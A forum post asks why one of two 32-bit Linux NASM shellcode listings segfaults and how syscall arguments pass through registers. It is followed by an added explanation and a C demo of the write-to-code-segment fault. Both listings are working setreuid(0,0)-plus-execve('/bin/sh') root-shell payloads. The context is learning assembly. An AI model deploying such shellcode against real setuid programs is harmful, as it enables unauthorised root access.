Hello,
To learn more not only about NASM but also about the fundamental principles of the whole system, and of C and NASM together, I've been working with shellcode for a few weeks.
But that's not actually the problem I've got. The main problem is understanding why and when I get segmentation faults after successfully compiling and linking.
Let me show you what I mean:
; The following example works fine after I've changed a few lines:
BITS 32
; setreuid (uid_t ruid, uid_t euid)
xor eax,eax
mov al,70
xor ebx,ebx
xor ecx,ecx
int 0x80
; execve (const char *filename, char *const arg[], char *const envp[])
jmp short two
one:
pop ebx
xor eax,eax
push eax
mov al,11
xor edx,edx
push ebx
mov ecx,esp
int 0x80
two:
call one
db '/bin/sh'
--------------------------------------------------------------
I get a shell, and if prepared accordingly it's a root shell.
But the next example doesn't work: I get a segmentation fault.
----------------------------------------------------------------------
BITS 32
; setreuid (uid_t ruid, uid_t euid)
xor eax,eax
mov al,70
xor ebx,ebx
xor ecx,ecx
int 0x80
; execve (const char *filename, char *const arg[], char *const envp[])
jmp short two
one:
pop ebx
xor eax,eax
mov [ebx+7],al
mov [ebx+8],ebx
mov [ebx+12],eax
mov al,11
lea ecx,[ebx+8]
lea edx,[ebx+12]
int 0x80
two:
call one
db '/bin/shXAAAABBBB'
----------------------------------------
The last one is especially described in one book as shellcode for working under Linux. I would only like to know why it doesn't work. It seems to me (I read this in different books) that it depends on how the stack and the registers are used. FreeBSD mainly uses the stack for arguments and Linux the registers.
I would like to know how to use the registers correctly in combination with the stack.
Examples of how to use the syscalls with registers would also be important to me. The syscall table I've got shows no more than headlines, and that is often not clear; even when I read the man pages I often don't get a really useful answer.
For example, in my syscall list execve is mentioned as one which gets the parameters only in ebx using a structure called pt_regs, but the other registers aren't mentioned, although one must use them (eax, ebx, ecx, edx) in order to execute the program correctly. And nothing is said about the stack and how many parameters can be used at all.
I would be happy about every helpful answer that makes it clearer to me.
Thanks
Michel
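The stores `mov [ebx+7],al`, `mov [ebx+8],ebx` and `mov [ebx+12],eax` in the second listing write into the 16 bytes after `call one`; in a binary assembled and linked from this file those bytes sit in the code segment, which the linker maps read+execute, and a store into such a page raises SIGSEGV, whereas the first listing builds its argv with `push` on the writable stack. The C program below is an added example (not from the post or the book it cites; function names are mine) that reproduces the mechanism: it applies the same three stores to a constructed copy of the data bytes in a writable page and in a read+execute page, catching the fault with a SIGSEGV handler, and checks the execve layout that results in the writable case.

```c
#define _GNU_SOURCE
#include <setjmp.h>
#include <signal.h>
#include <stdint.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

/* Constructed copy of the 16 data bytes that follow "call one" in the second listing. */
static const unsigned char book_bytes[16] = "/bin/shXAAAABBBB";
static sigjmp_buf fault_jmp;
static void on_segv(int sig) { (void)sig; siglongjmp(fault_jmp, 1); }

/* The three stores from the listing, with base standing in for ebx:
 *   mov [ebx+7],al -> NUL-terminate "/bin/sh";  mov [ebx+8],ebx -> argv[0] = pointer to it;
 *   mov [ebx+12],eax -> argv[1] = NULL (execve also receives this address as envp).
 * Returns 0 if every store landed, 1 if the page was not writable (SIGSEGV). */
int patch_argv(unsigned char *base) {
    struct sigaction sa, old;
    int faulted = 1;
    memset(&sa, 0, sizeof sa);
    sa.sa_handler = on_segv;
    sigaction(SIGSEGV, &sa, &old);
    if (sigsetjmp(fault_jmp, 1) == 0) {           /* the 1 restores the signal mask on longjmp */
        uint32_t ptr = (uint32_t)(uintptr_t)base; /* low 32 bits: the 4-byte store a 32-bit ebx makes */
        base[7] = 0;
        memcpy(base + 8, &ptr, 4);
        memset(base + 12, 0, 4);
        faulted = 0;
    }
    sigaction(SIGSEGV, &old, NULL);
    return faulted;
}

/* Copy the bytes into a fresh page, set its protection, then attempt the stores.
 * PROT_READ|PROT_EXEC is what a standalone binary's code segment gets from the linker;
 * PROT_READ|PROT_WRITE models writable memory such as the stack the first listing pushes to.
 * Returns 0 = stores landed and layout is right, 1 = SIGSEGV, 2 = wrong layout, -1 = setup error. */
int try_stores_with(int prot) {
    long pg = sysconf(_SC_PAGESIZE);
    unsigned char *p = mmap(NULL, pg, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (p == MAP_FAILED) return -1;
    memcpy(p, book_bytes, sizeof book_bytes);
    if (mprotect(p, pg, prot) != 0) { munmap(p, pg); return -1; }
    int r = patch_argv(p);
    if (r == 0) { /* verify the execve layout: "/bin/sh\0", argv[0] -> p, argv[1] == NULL */
        uint32_t a0, a1; memcpy(&a0, p + 8, 4); memcpy(&a1, p + 12, 4);
        if (memcmp(p, "/bin/sh", 8) != 0 || a0 != (uint32_t)(uintptr_t)p || a1 != 0) r = 2;
    }
    munmap(p, pg);
    return r;
}
```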